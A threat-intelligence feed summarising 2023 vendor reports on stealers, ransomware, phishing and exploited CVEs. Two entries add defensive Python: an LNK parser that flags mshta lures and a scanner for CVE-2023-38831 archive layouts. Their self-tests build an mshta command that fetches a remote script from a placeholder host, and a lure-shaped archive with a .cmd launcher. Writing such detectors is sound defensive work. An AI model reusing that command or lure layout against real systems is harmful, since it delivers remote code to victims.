- Summary:
- In January 2021, Google first reported that DPRK attackers were targeting not defenseless individuals or organizations but cybersecurity researchers themselves. The attackers have returned, this time armed with a new zero-day vulnerability, a fake software tool, and a strikingly broad phishing campaign.
—
- Intel Source:
- Checkpoint
- Intel Name:
- A_phishing_attack_using_Google_Looker_Studio
- Date of Scan:
- 2023-09-08
- Impact:
- LOW
- Summary:
- Check Point Harmony researchers describe how attackers combine social engineering with a Google-owned domain to elicit a user response and harvest credentials for cryptocurrency sites. In this attack, the attackers use Google Looker Studio to host the credential-harvesting crypto pages.
Source:
https://blog.checkpoint.com/security/phishing-via-google-looker-studio/
—
- Intel Source:
- Gteltsc
- Intel Name:
- Advanced_Attack_Groups_JavaScript_RATs_and_APT_Ransomware
- Date of Scan:
- 2023-09-08
- Impact:
- MEDIUM
- Summary:
- This article highlights Chimera Group targeting semiconductor and aerospace industries, a JavaScript RAT campaign in Asian government institutions, the Solorigate campaign’s transition, Chinese APT groups turning to ransomware, and the PLEASE_READ_ME ransomware campaign targeting MySQL servers.
Source:
https://gteltsc.vn/blog/thong-tin-cac-moi-de-doa-bao-mat-trong-thang-01-2021-9681.html
—
- Intel Source:
- ASEC
- Intel Name:
- RedEyes_CHM_Malware_Using_the_Topic_of_Fukushima_Wastewater_Release
- Date of Scan:
- 2023-09-08
- Impact:
- LOW
- Summary:
- ASEC researchers have found that the CHM malware believed to be the work of the RedEyes threat group is being distributed again. The CHM malware operates in the same way as the “CHM Malware Disguised as Security Email from a Korean Financial Company” covered in March of this year, and it uses the same commands seen in the “2.3. Persistence” stage of the RedEyes group’s M2RAT attack process.
—
- Intel Source:
- Esentire
- Intel Name:
- Fake_Browser_Updates_Distribute_Malware
- Date of Scan:
- 2023-09-08
- Impact:
- LOW
- Summary:
- eSentire’s Threat Response Unit (TRU) researchers have recently observed LummaC2 cases across multiple industries. LummaC2 is an information stealer sold as Malware-as-a-Service (MaaS) on Russian-language forums, and the researchers suspect it can also load additional malware onto the system. In a recent case in August, a user was infected with LummaC2, Amadey, and PrivateLoader after running a fake Chrome browser update.
—
- Intel Source:
- Flashpoint
- Intel Name:
- Return_of_RisePro_Stealer_With_New_Updates
- Date of Scan:
- 2023-09-08
- Impact:
- LOW
- Summary:
- The RisePro stealer made a comeback in July after going dark for almost seven months; according to its seller, the new and improved version gives customers a better experience.
Source:
https://flashpoint.io/blog/risepro-stealer-and-pay-per-install-malware-privateloader/
—
- Intel Source:
- Fortinet
- Intel Name:
- Spreading_New_Agent_Tesla_Variant_through_Excel_Document
- Date of Scan:
- 2023-09-07
- Impact:
- MEDIUM
- Summary:
- FortiGuard Labs researchers have discovered a phishing campaign spreading a new Agent Tesla variant. Agent Tesla is a well-known .NET-based data stealer and Remote Access Trojan (RAT) that is frequently offered as Malware-as-a-Service (MaaS). Their analysis of this campaign covers the full chain, from the initial phishing email through the actions Agent Tesla takes on the victim’s computer to the collection of personal data from the compromised device.
Source:
https://www.fortinet.com/blog/threat-research/agent-tesla-variant-spread-by-crafted-excel-document
—
- Intel Source:
- Trustwave
- Intel Name:
- Phishing_emails_abusing_another_Cloudflare_service
- Date of Scan:
- 2023-09-07
- Impact:
- LOW
- Summary:
- Trustwave is seeing a large volume of phishing emails whose URLs abuse another Cloudflare service, r2.dev. The subject lines use alarming or routine keywords such as “statement paid”, “upgrade mail”, and “purchase order”.
—
- Intel Source:
- Talos
- Intel Name:
- Cybercriminals_are_abusing_Advanced_Installer
- Date of Scan:
- 2023-09-07
- Impact:
- LOW
- Summary:
- Talos observed an ongoing cryptocurrency mining campaign that delivers malicious payloads by abusing Advanced Installer, a legitimate tool for creating Windows software packages. The software installers trojanized in this campaign are used for 3-D modeling and graphic design.
Source:
https://blog.talosintelligence.com/cybercriminals-target-graphic-designers-with-gpu-miners/
—
- Intel Source:
- Seqrite
- Intel Name:
- New_Warp_Malware_Dropping_Modified_Stealerium_Infostealer
- Date of Scan:
- 2023-09-07
- Impact:
- LOW
- Summary:
- To meet specific demands and exploit vulnerabilities, cybercriminals have begun marketing and distributing several stealthy malware variants. Modern stealers such as “Warp Stealer” are advanced and versatile: from infected PCs they can collect hardware specifications, network configuration, browser history, and private financial and online-activity data.
Source:
https://www.seqrite.com/blog/new-warp-malware-drops-modified-stealerium-infostealer/
—
- Intel Source:
- Sysdig
- Intel Name:
- In_depth_analysis_of_Scarleteel_2_threat
- Date of Scan:
- 2023-09-07
- Impact:
- LOW
- Summary:
- In this post, Sysdig analysts provide a detailed report on the SCARLETEEL attack. They map the incident to the MITRE ATT&CK framework, giving deep insight into the adversary’s operational tactics.
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Mac_users_targeted_in_new_malvertising_campaign_delivering_Atomic_Stealer
- Date of Scan:
- 2023-09-07
- Impact:
- LOW
- Summary:
- AMOS (Atomic Stealer) was first advertised in April 2023 as a macOS stealer with a strong focus on crypto assets; it also included a file grabber and the ability to harvest passwords from browsers and Apple’s keychain. The developer has continued to work on it, releasing a new version at the end of June.
—
- Intel Source:
- Zscaler
- Intel Name:
- An_Examination_of_a_New_Stealing_Campaign
- Date of Scan:
- 2023-09-07
- Impact:
- LOW
- Summary:
- Zscaler ThreatLabz has identified a new credential-theft campaign dubbed “Steal-It”. The threat actors use modified versions of Nishang’s Start-CaptureServer PowerShell script to steal and exfiltrate NTLMv2 hashes, run various system commands, and exfiltrate the collected data via Mockbin APIs.
Source:
https://www.zscaler.com/blogs/security-research/steal-it-campaign
—
- Intel Source:
- Checkmarx
- Intel Name:
- Info_Stealing_Malware_Plagues_Open_Source_Ecosystem
- Date of Scan:
- 2023-09-06
- Impact:
- LOW
- Summary:
- From April to mid-August, Checkmarx researchers observed the threat actor PYTA31 actively distributing “WhiteSnake” malware through malicious packages in the PyPI repository. The malware can target multiple operating systems.
—
- Intel Source:
- PaloAlto
- Intel Name:
- More_deep_look_at_RedLine_Stealer_traffic
- Date of Scan:
- 2023-09-06
- Impact:
- LOW
- Summary:
- In July 2023, the Palo Alto Networks Unit 42 team captured a packet capture (pcap) of a RedLine Stealer infection. Their analysis provides a detailed, closer look at RedLine Stealer network traffic.
Source:
https://unit42.paloaltonetworks.com/wireshark-quiz-redline-stealer-answers/
—
- Intel Source:
- Emanuele Delucia
- Intel Name:
- Analysis_of_the_FBI_Operation_Duck_Hunt
- Date of Scan:
- 2023-09-06
- Impact:
- LOW
- Summary:
- This analysis covers “Operation Duck Hunt”, the FBI-led operation that disrupted the Qakbot botnet. The name appears to have been chosen to evoke tracking down and disabling the Qakbot botnet, like shooting down ducks in the video game.
—
- Intel Source:
- Morphisec
- Intel Name:
- New_Chaes_Malware_Variant_Targeting_Logistics_and_Financial_Sectors
- Date of Scan:
- 2023-09-06
- Impact:
- LOW
- Summary:
- Morphisec researchers have identified a concerning pattern in which many of their clients, mostly in the banking and logistics sectors, were attacked by a new, highly developed variant of the Chaes malware. Between April and June 2023, variants of the threat were seen becoming more sophisticated.
Source:
https://www.morphisec.com/hubfs/Morphisec_Chae$4_Threat_Profile.pdf
—
- Intel Source:
- SOC Radar
- Intel Name:
- Dark_Web_Profile_of_Medusa_Ransomware
- Date of Scan:
- 2023-09-06
- Impact:
- LOW
- Summary:
- Cybersecurity professionals have been aware of the Medusa ransomware (also referred to as MedusaLocker) for some time. The Medusa ransomware gang operates under the ransomware-as-a-service (RaaS) model and collaborates with international affiliates, further extending its reach and impact.
Source:
https://socradar.io/dark-web-profile-medusa-ransomware-medusalocker/
—
- Intel Source:
- ASEC
- Intel Name:
- Backdoor_Distribution_Through_Malicious_LNK
- Date of Scan:
- 2023-09-06
- Impact:
- LOW
- Summary:
- According to ASEC researchers, malware formerly delivered in CHM format is now being distributed as LNK files. The malware uses the mshta process to run additional scripts hosted at a specific URL, and then receives commands from the threat actor’s server to carry out further malicious actions.
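The LNK-to-mshta chain described above can be triaged without opening the shortcut: the arguments string is stored in a fixed place in the Shell Link (MS-SHLLINK) format. The following is an added example, not ASEC’s code, that parses only as far as the COMMAND_LINE_ARGUMENTS field and flags argument strings that hand a URL to mshta. The sample .lnk is constructed in memory and the URL in it is a placeholder, not an indicator from the report. Assumption: the lure targets cmd.exe or powershell.exe and names mshta in its arguments; a lure whose link target is mshta.exe itself would carry only the URL in this string, so a production check should also parse the link target.

```python
"""Minimal MS-SHLLINK (.lnk) parser that pulls out the command-line arguments.

Added example, not ASEC's code. Reads only what is needed to reach the
COMMAND_LINE_ARGUMENTS string; the sample shortcut is constructed here.
"""
import re
import struct

# LinkFlags bits from MS-SHLLINK section 2.1.1.
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
IS_UNICODE = 0x80
HEADER_SIZE = 0x4C
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-...-46}

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


def _read_string(data, pos, unicode):
    """One StringData item: uint16 character count followed by the characters."""
    (count,) = struct.unpack_from("<H", data, pos)
    pos += 2
    if unicode:
        end = pos + 2 * count
        return data[pos:end].decode("utf-16-le"), end
    end = pos + count
    return data[pos:end].decode("latin-1"), end


def lnk_arguments(data):
    """Return the COMMAND_LINE_ARGUMENTS string of a .lnk, or '' if it has none."""
    if len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE:
        raise ValueError("not a Shell Link file")
    (flags,) = struct.unpack_from("<I", data, 0x14)  # LinkFlags follows the CLSID
    unicode = bool(flags & IS_UNICODE)
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:  # IDListSize (uint16) + IDList bytes
        (size,) = struct.unpack_from("<H", data, pos)
        pos += 2 + size
    if flags & HAS_LINK_INFO:            # LinkInfoSize (uint32) counts itself
        (size,) = struct.unpack_from("<I", data, pos)
        pos += size
    # StringData items appear in this fixed order, each only if its flag is set.
    for flag in (HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR):
        if flags & flag:
            _, pos = _read_string(data, pos, unicode)
    if not flags & HAS_ARGUMENTS:
        return ""
    args, _ = _read_string(data, pos, unicode)
    return args


def remote_script_urls(args):
    """URLs embedded in the argument string."""
    return URL_RE.findall(args)


def is_mshta_lure(args):
    """True when the arguments invoke mshta with a remote script URL."""
    return "mshta" in args.lower() and bool(remote_script_urls(args))


def build_sample_lnk(args):
    """Constructed .lnk: header plus a Unicode arguments string, nothing else."""
    flags = HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I", HEADER_SIZE) + LINK_CLSID
    # LinkFlags, FileAttributes, Creation/Access/Write time, FileSize, IconIndex,
    # ShowCommand (1 = SW_SHOWNORMAL), HotKey, Reserved1, Reserved2, Reserved3.
    header += struct.pack("<IIQQQIIIHHII", flags, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    assert len(header) == HEADER_SIZE
    return header + struct.pack("<H", len(args)) + args.encode("utf-16-le")


if __name__ == "__main__":
    sample = build_sample_lnk('/c start "" mshta.exe http://example.invalid/a.hta')
    args = lnk_arguments(sample)
    print(args, is_mshta_lure(args), remote_script_urls(args))
```

Real shortcuts usually also carry a LinkTargetIDList and LinkInfo block; the parser skips both by their size fields, so it works on those as well, and `ValueError` is raised on anything that does not start with the 0x4C-byte header.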
—
- Intel Source:
- Zscaler
- Intel Name:
- Insights_into_DuckTail_operation
- Date of Scan:
- 2023-09-06
- Impact:
- LOW
- Summary:
- Zscaler ThreatLabz began collecting intelligence on the DuckTail operation in May 2023. Over the following months this collection yielded critical details about DuckTail’s operational framework and gave the team visibility into its end-to-end operations, spanning the entire kill chain from reconnaissance to post-compromise activity, along with insight into its intrusion techniques, compromise tactics, post-compromise procedures, and the underground economy around it.
Source:
https://www.zscaler.com/blogs/security-research/look-ducktail
—
- Intel Source:
- Cyfirma
- Intel Name:
- New_MaaS_Prysmax_malware
- Date of Scan:
- 2023-09-06
- Impact:
- LOW
- Summary:
- The CYFIRMA research team has identified a new malware-as-a-service offering known as Prysmax. The malware is marketed as fully undetectable by the signature-based detections commonly employed by antivirus solutions. By manipulating file associations and executing alongside legitimate .exe processes, the Prysmax stealer maximizes its reach and impact.
Source:
https://www.cyfirma.com/outofband/new-maas-prysmax-launches-fully-undetectable-infostealer/
—
- Intel Source:
- CERT-UA
- Intel Name:
- Cyberattack_by_APT28_Using_msedge_as_a_Bootloader
- Date of Scan:
- 2023-09-05
- Impact:
- LOW
- Summary:
- CERT-UA researchers have observed a targeted cyber attack against a critical Ukrainian energy infrastructure facility. The attack is carried out via an email with a spoofed sender address containing a link to an archive such as “photo.zip”.
—
- Intel Source:
- Security Joes
- Intel Name:
- Hackers_Exploiting_MinIO_Storage_System
- Date of Scan:
- 2023-09-05
- Impact:
- LOW
- Summary:
- Security Joes researchers report that attackers are exploiting the MinIO object storage system to break into target environments.
—
- Intel Source:
- Okta
- Intel Name:
- Okta_Warns_of_Social_Engineering_Attacks
- Date of Scan:
- 2023-09-04
- Impact:
- LOW
- Summary:
- Okta reports that several of its U.S.-based customers have seen a rise in social engineering attacks against IT service desk staff in recent weeks. The callers’ tactic was to persuade service desk staff to reset all multi-factor authentication (MFA) factors enrolled by highly privileged users.
Source:
https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection
—
- Intel Source:
- ASEC
- Intel Name:
- Following_the_Spread_of_Fileless_Malware_Through_Spam_Emails
- Date of Scan:
- 2023-09-04
- Impact:
- LOW
- Summary:
- ASEC researchers have uncovered a phishing campaign, spread via spam emails, that executes a PE file (EXE) without ever writing it to the victim’s disk. The attachment, an .hta file, ultimately executes the AgentTesla, Remcos, and LimeRAT malware strains.
—
- Intel Source:
- Securonix Threat Labs
- Intel Name:
- FreeWorld_Ransomware_Attacks_on_MSSQL_Databases
- Date of Scan:
- 2023-09-04
- Impact:
- MEDIUM
- Summary:
- Securonix Threat Labs research shows that compromised Microsoft SQL Server (MSSQL) databases are being used to deliver Cobalt Strike and ransomware payloads. Using MSSQL as a beachhead, the attackers first infiltrate the target machine and then deploy a variety of payloads, including remote-access Trojans (RATs) and a new Mimic ransomware variant named FreeWorld.
—
- Intel Source:
- Seqrite
- Intel Name:
- ZeroDay_Vulnerabilities_Detected_on_WinRAR
- Date of Scan:
- 2023-09-04
- Impact:
- MEDIUM
- Summary:
- Two zero-day vulnerabilities, CVE-2023-38831 and CVE-2023-40477, have been discovered in the widely used WinRAR software. Both can lead to remote code execution, which raises serious security concerns given that WinRAR, with half a billion users worldwide, is a popular compression tool embedded in many workflows.
Source:
https://www.seqrite.com/blog/threat-advisory-zero-day-vulnerabilities-detected-on-winrar/
—
- Intel Source:
- Interlab
- Intel Name:
- A_new_campaign_of_novel_RAT
- Date of Scan:
- 2023-09-02
- Impact:
- LOW
- Summary:
- On 8/28/2023, Interlab obtained a sample that had been sent to a journalist with highly targeted content luring the recipient to open the document. After initial compromise, an AutoIt script performs process injection using process hollowing; the injected process contains a novel RAT, named “SuperBear” after naming conventions in its code.
—
- Intel Source:
- Talos
- Intel Name:
- Analyses_on_new_open_source_infostealer
- Date of Scan:
- 2023-09-02
- Impact:
- LOW
- Summary:
- In this week’s edition of the Threat Source newsletter, Talos notes that it is seeing more and more adversaries take advantage of tools that have been uploaded to public malware repositories, such as the infostealer “SapphireStealer”, which Talos researchers analyzed and described in their blog.
Source:
https://blog.talosintelligence.com/new-open-source-infostealer-and-reflections-on-2023-so-far/
—
- Intel Source:
- Rapid7
- Intel Name:
- New_IDAT_Loader_executes_StealC_and_Lumma_Infostealers
- Date of Scan:
- 2023-09-02
- Impact:
- LOW
- Summary:
- Rapid7 recently observed a fake browser update campaign tricking users into executing malicious binaries. While analyzing the dropped binaries, Rapid7 determined that a new loader is being used to execute infostealers, including StealC and Lumma, on compromised systems.
—
- Intel Source:
- Resecurity
- Intel Name:
- The_attacks_on_USPS_and_US_Citizens_for_data_theft
- Date of Scan:
- 2023-09-01
- Impact:
- LOW
- Summary:
- Resecurity has discovered a large-scale smishing campaign targeting US citizens; similar scams have previously targeted FedEx and UPS customers. The actors, attributed to Chinese-speaking cybercriminals, use a package-tracking text scam sent via iMessage to collect personal information (PII) and payment data from victims for identity theft and credit card fraud. The group behind the campaign has been named “Smishing Triad” because it relies on smishing as its main attack vector and originates from China.
Source:
https://www.resecurity.com/blog/article/smishing-triad-targeted-usps-and-us-citizens-for-data-theft
—
- Intel Source:
- CERT-UA
- Intel Name:
- Exploitation_of_CVE_2023_38831
- Date of Scan:
- 2023-09-01
- Impact:
- LOW
- Summary:
- The Ukrainian government computer emergency response team CERT-UA has observed a cyberattack by the UAC-0057 group. The file “Zbirnyk_tez_Y_23.rar” was found to contain an exploit for CVE-2023-38831. When the exploit succeeds, it launches the BAT file “16872_16_2023_03049.pdf.cmd”, which launches the LNK file “16872_16_2023_03049.lnk”, which in turn invokes mshta.
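The CVE-2023-38831 lure in this entry, and the WinRAR zero-day advisory above, can be screened for at the mail gateway or sandbox by looking at archive entry names alone. The following is an added example, not CERT-UA’s or Seqrite’s code. Its assumption, taken from public descriptions of the bug rather than from this entry, is that the lure stores a decoy document next to a directory named like the decoy plus a trailing space, and that the directory holds a script with the same trailing-space name, so that a vulnerable WinRAR runs the script when the user opens the decoy. It is written for ZIP because the standard library can read that format; CERT-UA’s sample was a RAR, which needs a third-party reader, but the naming heuristic is identical. The sample archive is constructed here using the file names from the entry.

```python
"""Heuristic check for archives laid out like CVE-2023-38831 lures.

Added example, not CERT-UA's or Seqrite's code. The trailing-space layout is
an assumption from public descriptions of the bug; the sample is constructed.
"""
import io
import zipfile

SCRIPT_EXTS = (".cmd", ".bat", ".vbs", ".js", ".ps1", ".exe", ".scr", ".hta", ".lnk")
DECOY_EXTS = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".jpg", ".png", ".txt")


def find_38831_pairs(names):
    """Return (decoy, script_entry) pairs found in a list of archive entry names."""
    decoys = {n for n in names if "/" not in n and n.lower().endswith(DECOY_EXTS)}
    hits = []
    for name in names:
        folder, sep, leaf = name.partition("/")
        if not sep or not leaf:
            continue                      # top-level file or bare directory entry
        # A directory whose name is a decoy's name plus trailing space(s).
        if not folder.endswith(" ") or folder.rstrip(" ") not in decoys:
            continue
        if leaf.rstrip(" ").lower().endswith(SCRIPT_EXTS):
            hits.append((folder.rstrip(" "), name))
    return hits


def scan_zip_bytes(data):
    """Scan an in-memory ZIP by its central directory, without extracting anything."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return find_38831_pairs(zf.namelist())


def build_sample_archive():
    """Constructed lure layout using the names from the CERT-UA entry."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("16872_16_2023_03049.pdf", b"%PDF-1.4 decoy\n")
        zf.writestr("16872_16_2023_03049.pdf /16872_16_2023_03049.pdf .cmd",
                    b"@echo off\r\nstart \"\" 16872_16_2023_03049.lnk\r\n")
    return buf.getvalue()


if __name__ == "__main__":
    for decoy, script in scan_zip_bytes(build_sample_archive()):
        print(f"CVE-2023-38831 layout: {decoy!r} shadowed by {script!r}")
```

Only the entry names are inspected, so the check costs nothing beyond reading the central directory and never extracts the script. A directory that merely shares a decoy’s name without the trailing space is not flagged, which keeps ordinary archives quiet.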
—
- Intel Source:
- Checkpoint
- Intel Name:
- Custom_Executable_Formats_From_Hidden_Bee_to_Rhadamanthys
- Date of Scan:
- 2023-09-01
- Impact:
- LOW
- Summary:
- The design and implementation of the Hidden Bee coin miner and the Rhadamanthys stealer overlap considerably. The similarities are readily apparent: custom executable formats, similar virtual filesystems, the use of LUA scripts, identical paths to some components, reused functions, similar use of steganography, and an overall related architecture.
—
- Intel Source:
- Eclecticiq
- Intel Name:
- Decrypting_Key_Group_Ransomware
- Date of Scan:
- 2023-09-01
- Impact:
- LOW
- Summary:
- EclecticIQ analysts assess Key Group ransomware as the work of a low-sophistication threat actor. The ransomware samples contained multiple cryptographic mistakes that allowed EclecticIQ to build a decryption tool for the version compiled on August 3, 2023. Key Group, or KEYGROUP777, is a Russian-speaking cybercrime actor focused on financial gain through selling personally identifiable information (PII) or initial access to compromised devices and collecting ransom payments.
—
- Intel Source:
- Cybergeeks
- Intel Name:
- A_detailed_analyses_of_Brute_Ratel_C4_payloads
- Date of Scan:
- 2023-09-01
- Impact:
- LOW
- Summary:
- Cyber Geeks performed an in-depth analysis of Brute Ratel C4 payloads. Brute Ratel C4 is a red team and adversary simulation framework that can be considered an alternative to Cobalt Strike.
Source:
https://cybergeeks.tech/a-deep-dive-into-brute-ratel-c4-payloads/
—
- Intel Source:
- Trustwave
- Intel Name:
- Malicious_PDFs
- Date of Scan:
- 2023-09-01
- Impact:
- LOW
- Summary:
- Over the last couple of months, Trustwave SpiderLabs analysts have noticed a spike in threat actors employing PDF documents to gain initial access through email-borne attacks. Though the use of PDF files as a malicious vector is not a novel approach, it has become more popular as threat actors continue to experiment with techniques to bypass conventional security controls.
—
- Intel Source:
- TrendMicro
- Intel Name:
- Taking_down_the_main_admin_of_phishing_as_a_service_16shop
- Date of Scan:
- 2023-09-01
- Impact:
- LOW
- Summary:
- TrendMicro published its analysis of and investigations into the phishing-as-a-service platform 16shop over the years, and described the partnership between Trend Micro and Interpol in taking down the main administrators and servers of this massive phishing campaign.
—
- Intel Source:
- Talos
- Intel Name:
- An_Open_Source_Info_Stealer_Named_SapphireStealer
- Date of Scan:
- 2023-09-01
- Impact:
- LOW
- Summary:
- In December 2022, SapphireStealer was first published by the open-source community as an information stealing malware. Since then, it’s been observed across a number of public malware repositories with increasing frequency. The researchers have moderate confidence that multiple entities are using SapphireStealer. They have separately improved and modified the original code base, extending it to support additional data exfiltration mechanisms.
Source:
https://blog.talosintelligence.com/sapphirestealer-goes-open-source/
—
- Intel Source:
- Fortinet
- Intel Name:
- The_attacks_on_Adobe_ColdFusion
- Date of Scan:
- 2023-08-31
- Impact:
- LOW
- Summary:
- Last month, Adobe took countermeasures against the exploitation of pre-authentication remote code execution (RCE) vulnerabilities in its ColdFusion solution. FortiGuard Labs IPS telemetry data again detected numerous efforts to exploit the Adobe ColdFusion deserialization of untrusted data vulnerability, which creates a huge risk of arbitrary code execution. These attacks include probing, establishing reverse shells, and deploying malware for subsequent actions. Fortinet analysts shared their detailed analysis of how this threat group exploits the Adobe ColdFusion vulnerability.
—
- Intel Source:
- ASEC
- Intel Name:
- Examining_Andariel_Recent_Attacking_Activities
- Date of Scan:
- 2023-08-31
- Impact:
- LOW
- Summary:
- Attacks thought to have been carried out by the Andariel group have been found by ASEC researchers. It is known that the Lazarus threat group or one of its affiliates is associated with the Andariel threat group, which typically targets Korean businesses and organizations. Since 2008, attacks on targets in Korea have been noted.
—
- Intel Source:
- SentinelOne
- Intel Name:
- A_new_wave_of_Good_Day_ransomware_attacks
- Date of Scan:
- 2023-08-31
- Impact:
- LOW
- Summary:
- SentinelOne researchers shared in their blog several unique Good Day ransom notes and victim portals, and shared their analysis of a sample associated with a URL leading to a known Cloak extortion site. Good Day ransomware is a variant within the ARCrypter family. This new wave of Good Day attacks features individual TOR-based victim portals for each target.
—
- Intel Source:
- Walmart Global Tech Blog
- Intel Name:
- DGA_analysis_and_the_Gazavat_DMSniff_link
- Date of Scan:
- 2023-08-31
- Impact:
- LOW
- Summary:
- Gazavat, a multi-functional backdoor that shares code with the POS malware DMSniff, is also known as Expiro, at least in part. Over the years, AV companies have grouped it alongside a few other malware versions under the name Expiro, a file infector. This is a result of various malware families using code from the Carberp malware leak.
Source:
https://medium.com/walmartglobaltech/gazavat-expiro-dmsniff-connection-and-dga-analysis-8b965cc0221d
—
- Intel Source:
- Rapid7
- Intel Name:
- The_increased_threat_activity_against_Cisco_ASA_SSL_VPN_appliances
- Date of Scan:
- 2023-08-31
- Impact:
- MEDIUM
- Summary:
- Rapid7’s managed detection and response team has discovered increased threat activity targeting Cisco ASA SSL VPN appliances (physical and virtual). In some cases, adversaries conducted credential stuffing attacks that leveraged weak or default passwords; in others, the observed activity appears to be the result of targeted brute-force attacks on ASA appliances where multi-factor authentication (MFA) was either not enabled or was not enforced for all users (i.e., via MFA bypass groups).
—
- Intel Source:
- Secureworks
- Intel Name:
- The_actions_against_the_Qakbot_botnet
- Date of Scan:
- 2023-08-30
- Impact:
- MEDIUM
- Summary:
- On August 29, 2023, U.S. law enforcement announced a national operation that disrupted the Qakbot botnet (also known as Qbot) and its associated infrastructure. Secureworks Counter Threat Unit researchers have monitored this botnet for a long time and detected the disruption activity on August 25. The initial access vector for these intrusions was a phishing email. Qakbot was one of the top malware threats, used by cybercriminals to deliver other malware such as Conti, ProLock, Egregor, REvil, MegaCortex, and Black Basta. The botnet was lucrative for the GOLD LAGOON threat group, which has operated the Qakbot malware since 2007. The threat actors reportedly received approximately $58 million in ransom payments between October 2021 and April 2023.
Source:
https://www.secureworks.com/blog/qakbot-campaign-delivered-black-basta-ransomware
—
- Intel Source:
- Aquasec
- Intel Name:
- The_exploition_of_Kinsing_Malware
- Date of Scan:
- 2023-08-30
- Impact:
- LOW
- Summary:
- Aqua Nautilus observed a new malware campaign that exploits the Openfire vulnerability (CVE-2023-32315) which deploys Kinsing malware and a cryptominer. This vulnerability leads to a path traversal attack, which grants an unauthenticated user access to the Openfire setup environment. This then allows the threat actor to create a new admin user and upload malicious plugins. Eventually the attacker can gain full control over the server.
Source:
https://blog.aquasec.com/kinsing-malware-exploits-novel-openfire-vulnerability
—
- Intel Source:
- Trustwave
- Intel Name:
- The_Rise_of_QR_Codes_in_Phishing
- Date of Scan:
- 2023-08-30
- Impact:
- LOW
- Summary:
- Threat actors are taking image phishing to the next level by taking advantage of QR codes, a.k.a. ‘Qishing’, to hide their malicious URLs. The samples Trustwave analysts observed using the technique are primarily disguised as Multifactor Authentication (MFA) notifications, which trick their victims into scanning the QR code with their mobile phones to gain access. However, instead of going to the target’s desired location, the QR code leads them to the threat actor’s phishing page.
—
- Intel Source:
- TrendMicro
- Intel Name:
- Earth_Estries_Targeting_Government_and_Technology_Sector
- Date of Scan:
- 2023-08-30
- Impact:
- MEDIUM
- Summary:
- Researchers from TrendMicro have uncovered a fresh cyberespionage operation by the Earth Estries hacker collective. As Earth Estries targets governments and enterprises in the technology sector, they found parallels with the advanced persistent threat (APT) group FamousSparrow after analyzing the deployed tactics, techniques, and procedures (TTPs).
—
- Intel Source:
- McAfee
- Intel Name:
- RemcosRat_Malware_Peeled_Back
- Date of Scan:
- 2023-08-30
- Impact:
- LOW
- Summary:
- Researchers from McAfee have discovered a Remcos RAT operation that uses phishing emails to distribute malicious VBS scripts. A ZIP/RAR attachment was included in the phishing email; inside this archive is a highly obfuscated VBS file.
Source:
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/peeling-back-the-layers-of-remcosrat-malware/
—
- Intel Source:
- Sophos
- Intel Name:
- Hackers_Targeting_Unpatched_Citrix_and_NetScaler_Systems
- Date of Scan:
- 2023-08-29
- Impact:
- LOW
- Summary:
- A campaign by threat actors to target unpatched Citrix and NetScaler systems that are online is currently being monitored by Sophos X-Ops. The data shows a considerable similarity between CVE-2023-3519-based attacks that deliver malware and webshells and earlier attempts that used many of the same TTPs.
IOC link: https://github.com/sophoslabs/IoCs/blob/master/2023-08-25%20Citrix%20CVE-2023-3519%20attacks.csv
Source:
https://infosec.exchange/@SophosXOps/110951651051968204
—
- Intel Source:
- JPCERT
- Intel Name:
- Embedding_a_malicious_Word_file_into_a_PDF_file
- Date of Scan:
- 2023-08-29
- Impact:
- LOW
- Summary:
- JPCERT/CC has discovered that a new technique was used in a July attack, which bypassed detection by embedding a malicious Word file into a PDF file. They named the technique “MalDoc in PDF” and explained in their blog the details of it and countermeasures against it.
Source:
https://blogs.jpcert.or.jp/en/2023/08/maldocinpdf.html
—
- Intel Source:
- Phylum
- Intel Name:
- NPM_Package_Masquerading
- Date of Scan:
- 2023-08-29
- Impact:
- LOW
- Summary:
- On August 24, 2023, Phylum’s detection system observed a suspicious package published to npm called “emails-helper.” After investigating it, they determined that this package was part of a sophisticated attack involving Base64-encoded and encrypted binaries. The scheme retrieves encryption keys from a DNS TXT record hosted on a remote server. Additionally, a hex-encoded URL is retrieved from this remote server and then passed to the spawned binaries. The outcome is the deployment of powerful penetration testing tools such as dnscat2, mettle, and Cobalt Strike Beacon.
Source:
https://blog.phylum.io/npm-emails-validator-package-malware/
—
- Intel Source:
- Telekom Security
- Intel Name:
- DarkGate_Malware_Activity_Spikes
- Date of Scan:
- 2023-08-29
- Impact:
- LOW
- Summary:
- Telekom security researchers have identified that a new malspam campaign was observed deploying an off-the-shelf malware called DarkGate. The current spike in DarkGate malware activity is plausible given the fact that the developer of the malware has recently started to rent out the malware to a limited number of affiliates.
Source:
https://github.security.telekom.com/2023/08/darkgate-loader.html
—
- Intel Source:
- Security Affairs
- Intel Name:
- Target_on_Citrix_NetScaler_systems_in_massive_attacks
- Date of Scan:
- 2023-08-29
- Impact:
- MEDIUM
- Summary:
- Sophos X-Ops has tracked an ongoing campaign, which is targeting Citrix NetScaler systems, conducted by threat actors linked to the FIN8 group. The hackers are exploiting the remote code execution, tracked as CVE-2023-3519, in a large-scale campaign. The flaw CVE-2023-3519 (CVSS score: 9.8) is a code injection that could result in unauthenticated remote code execution.
Source:
https://securityaffairs.com/150028/hacking/fin8-citrix-netscaler.html?amp=1
—
- Intel Source:
- CERT-UA
- Intel Name:
- Emails_Containing_BAT_Files_in_BZIP_GZIP_and_RAR_Archives
- Date of Scan:
- 2023-08-28
- Impact:
- MEDIUM
- Summary:
